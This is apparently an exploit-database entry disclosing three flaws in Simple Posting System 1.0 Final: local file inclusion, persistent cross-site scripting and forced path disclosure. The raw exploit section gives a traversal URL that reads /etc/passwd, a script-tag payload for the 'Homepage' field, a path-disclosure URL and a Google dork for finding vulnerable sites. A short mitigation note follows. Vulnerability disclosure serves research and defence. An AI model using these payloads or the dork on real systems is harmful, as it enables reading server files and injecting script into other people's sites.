header-logo
Suggest Exploit
vendor:
Simple Posting System
by:
n0tch aka andmuchmore
8,8
CVSS
HIGH
LFI, Persistent XSS, FPD
22, 79, 564
CWE
Product Name: Simple Posting System
Affected Version From: 1.0 Final
Affected Version To: 1.0 Final
Patch Exists: NO
Related CWE: N/A
CPE: a:realize:simple_posting_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7, Linux(Ubuntu)
2012

Simple Posting System [Multple]

The vulnerability is a Local File Inclusion (LFI) vulnerability which allows an attacker to read arbitrary files on the server. The vulnerable parameter is 'old' which can be exploited by appending '../' to the URL. The application is also vulnerable to Persistent XSS which can be exploited by entering a malicious payload in the 'Homepage' field. Lastly, the application is vulnerable to Forced Path Disclosure (FPD) which can be exploited by manipulating the 'aantal' parameter in the comment.php page.

Mitigation:

Input validation should be implemented to prevent malicious payloads from being executed. Access control should be implemented to restrict access to sensitive files and directories.
Source

Exploit-DB raw data:

# Exploit Title: Simple Posting System [Multple]
# Google Dork: inurl:sps.php?old= or inurl:sps.php "
# Date: 14/03/2012
# Author: n0tch aka andmuchmore
# Software Link: http://realize.be/files/sps.tar.gz
# Version: 1.0 Final
# Tested on:  Windows 7 / Linux(Ubuntu)


+[-- LFI --]+

http://localhost/sps.php?old=../../../../../../../../../../../../../../../../../etc/passwd%00

+[-- Persistent XSS --]+

Vulnerable Field = "Homepage"
Payload syntax: ><script>alert('XSS');</script>

+[-- FPD --]+

http://localhost/sps/sps_admin/comment.php?op=del&id=3&aantal=4

+[-- Shoutz --]+

All the belegit crew..

Navigation

Suggest Exploit

Services By CQR